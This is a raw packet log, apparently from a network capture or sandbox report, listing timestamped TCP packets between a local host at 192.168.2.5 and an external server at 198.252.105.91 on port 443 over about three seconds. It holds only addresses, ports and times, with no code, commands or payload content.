                                                                                                                              Nov 13, 2024 16:28:04.445431948 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.445436001 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.445447922 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.445489883 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.449590921 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.449615955 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.449692011 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.449702024 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.471039057 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.471065044 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.471183062 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.471204996 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.515763998 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.533327103 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.533360004 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.533432007 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.533453941 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.533492088 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.533504009 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.588721037 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.588788986 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.588862896 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.588885069 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.588932991 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.694298029 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.694329023 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.694420099 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.694437981 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.694533110 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.705768108 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.705789089 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.705881119 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.705897093 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.705933094 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.821270943 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.821296930 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.821436882 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.821460009 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.821512938 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.822786093 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.822802067 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.822866917 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.822877884 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.822913885 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.945275068 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.945301056 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.945362091 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.945379972 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.945404053 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.945420027 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.946703911 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.946722031 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.946757078 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.946763992 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:04.946791887 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:04.946809053 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.061950922 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.061983109 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.062038898 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.062061071 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.062083960 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.062102079 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.063704014 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.063723087 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.063775063 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.063779116 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.063808918 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.178700924 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.178725004 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.178822041 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.178849936 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.178891897 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.179815054 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.179831982 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.179878950 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.179883957 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.179913998 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.234348059 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.234374046 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.234461069 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.234469891 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.234551907 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.296103001 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.296128035 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.296230078 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.296257019 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.296293020 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.350719929 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.350789070 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.350819111 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.350843906 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.350878000 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.350905895 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.412733078 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.412755966 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.412856102 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.412883043 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.412942886 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.413861990 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.413880110 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.413944960 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.413952112 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.413985014 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.529216051 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.529283047 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.529304981 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.529334068 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.529346943 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.529380083 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.530062914 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.530109882 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.530133009 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.530139923 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.530169010 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.530185938 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.584361076 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.584384918 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.584471941 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.584491968 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.584531069 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.646169901 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.646197081 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.646292925 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.646308899 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.646354914 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.646989107 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.647006035 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.647039890 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.647046089 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.647073984 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.647092104 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.701452971 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.701472998 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.701576948 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.701596022 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.701628923 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.763420105 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.763487101 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.763557911 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.763586044 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.763606071 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.763628960 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.805018902 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.805100918 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.805144072 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.805171013 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.805214882 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.805233002 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.818845987 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.818867922 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.818958044 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.818977118 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.819020033 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.880178928 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.880198956 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.880331039 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.880341053 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.880383015 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.935956001 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.935973883 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.936088085 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.936114073 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.936156034 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.936330080 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.936346054 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.936395884 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.936399937 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.936434031 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.997072935 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.997092962 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.997210979 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:05.997222900 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:05.997262955 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.052758932 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.052795887 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.052862883 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.052889109 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.052902937 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.052932024 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.053647041 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.053667068 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.053735971 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.053740978 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.053788900 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.114073038 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.114094973 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.114164114 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.114181995 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.114222050 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.115328074 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.115344048 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.115396976 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.115401983 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.115438938 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.169935942 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.169959068 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.170079947 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.170098066 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.170135021 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.230699062 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.230721951 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.230845928 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.230859995 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.230899096 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.231261015 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.231277943 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.231324911 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.231329918 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.231365919 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.286756992 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.286834002 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.286916971 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.286943913 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.286968946 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.286994934 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.287436008 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.287484884 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.287512064 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.287518024 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.287545919 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.287569046 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.347949028 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.347979069 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.348071098 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.348098040 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.348135948 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.348975897 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.348994970 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.349050045 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.349054098 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.349090099 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.403915882 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.403978109 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.404028893 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.404056072 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.404071093 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.404100895 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.465065002 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.465132952 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.465197086 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.465226889 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.465260983 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.465281010 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.466187954 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.466240883 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.466267109 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.466272116 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.466305017 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.466324091 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.520080090 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.520113945 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.520211935 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.520239115 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.520281076 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.520714045 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.520731926 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.520772934 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.520781994 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.520804882 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.520823002 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.581830025 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.581856012 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.581938028 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.581955910 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.581971884 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.581998110 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.583024025 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.583041906 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.583082914 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.583086967 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.583113909 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.583132029 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.636945963 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.636967897 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.637015104 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.637036085 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.637048006 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.637070894 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.637675047 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.637690067 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.637754917 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.637758970 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.637789011 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.850028038 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.850050926 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.850294113 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.850311041 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.850337982 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.850359917 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.850408077 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.850961924 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.850975990 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.851032972 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.851038933 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.855171919 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.855196953 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.855241060 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.855251074 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.855288029 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.856142998 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.856157064 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.856209040 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.856214046 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.856237888 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.856978893 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.856998920 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.857023954 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.857028008 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.857049942 CET49705443192.168.2.5198.252.105.91
                                                                                                                              Nov 13, 2024 16:28:06.857774973 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.857790947 CET44349705198.252.105.91192.168.2.5
                                                                                                                              Nov 13, 2024 16:28:06.857825041 CET49705443192.168.2.5198.252.105.91
